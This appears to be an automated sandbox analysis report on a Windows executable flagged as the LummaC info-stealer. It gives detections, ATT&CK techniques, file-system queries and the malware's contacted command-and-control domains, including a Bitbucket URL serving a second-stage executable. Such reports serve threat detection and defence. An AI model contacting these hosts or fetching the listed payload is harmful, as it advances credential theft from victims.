                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		2
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		2
                Process Injection                		LSASS Memory751
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                jSFUzuYPG9.exe63%ReversingLabsWin32.Infostealer.Tinba
                jSFUzuYPG9.exe51%VirustotalBrowse
                jSFUzuYPG9.exe100%AviraTR/Crypt.TPM.Gen
                jSFUzuYPG9.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                		52.216.152.124
                		truefalse
                  		high
                  bitbucket.org
                  		185.166.143.49
                  		truefalse
                    		high
                    steamcommunity.com
                    		23.55.153.106
                    		truefalse
                      		high
                      lev-tolstoi.com
                      		104.21.66.86
                      		truefalse
                        		high
                        bbuseruploads.s3.amazonaws.com
                        		unknown
                        		unknownfalse
                          		high
                          sweepyribs.lat
                          		unknown
                          		unknownfalse
                            		high
                            necklacebudi.lat
                            		unknown
                            		unknownfalse
                              		high
                              sustainskelet.lat
                              		unknown
                              		unknownfalse
                                		high
                                crosshuaht.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  rapeflowwj.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    grannyejh.lat
                                    		unknown
                                    		unknownfalse
                                      		high
                                      aspecteirs.lat
                                      		unknown
                                      		unknownfalse
                                        		high
                                        discokeyus.lat
                                        		unknown
                                        		unknownfalse
                                          		high
                                          energyaffai.lat
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            aspecteirs.latfalse
                                              		high
                                              sweepyribs.latfalse
                                                		high
                                                sustainskelet.latfalse
                                                  		high
                                                  rapeflowwj.latfalse
                                                    		high
                                                    https://steamcommunity.com/profiles/76561199724331900false
                                                      		high
                                                      energyaffai.latfalse
                                                        		high
                                                        https://lev-tolstoi.com/apifalse
                                                          		high
                                                          grannyejh.latfalse
                                                            		high
                                                            necklacebudi.latfalse
                                                              		high

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/chrome_newtabjSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://player.vimeo.comjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.jSFUzuYPG9.exefalse
                                                                      		unknown
                                                                      https://duckduckgo.com/ac/?q=jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://lev-tolstoi.com/xjSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampjSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://steamcommunity.com/?subsection=broadcastsjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&ctajSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://sustainskelet.lat/jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://sustainskelet.lat/djSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://store.steampowered.com/subscriber_agreement/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.gstatic.cn/recaptcha/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEEjSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://sustainskelet.lat/apijSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.valvesoftware.com/legal.htmjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.youtube.comjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.comjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://login.s7jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://lev-tolstoi.com/;#jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://lev-tolstoi.com/cEjSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aui-cdn.atlassian.com/jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engljSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCjSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://s.ytimg.com;jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://lev-tolstoi.com/hjSFUzuYPG9.exe, 00000000.00000003.1474837277.0000000005DEB000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474953402.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steam.tv/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://energyaffai.lat:443/api=jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netjSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exejSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enjSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l==jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://lev-tolstoi.com/jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://store.steampowered.com/privacy_agreement/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com:443/profiles/76561199724331900jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://store.steampowered.com/points/shop/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://ocsp.rootca1.amazontrust.com0:jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorjSFUzuYPG9.exe, 00000000.00000002.1979443513.00000000064D9000.00000002.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1649934312.0000000005EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&ajSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://sketchfab.comjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.ecosia.org/newtab/jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://lv.queniujq.cnjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://grannyejh.lat:443/api$jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brjSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.youtube.com/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/privacy_agreement/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netjSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://cdn.cookielaw.org/jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.google.com/recaptcha/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://checkout.steampowered.com/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://sweepyribs.lat:443/apijSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgjSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://store.steampowered.com/;PerjSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://store.steampowered.com/;jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/about/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://steamcommunity.com/my/wishlist/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
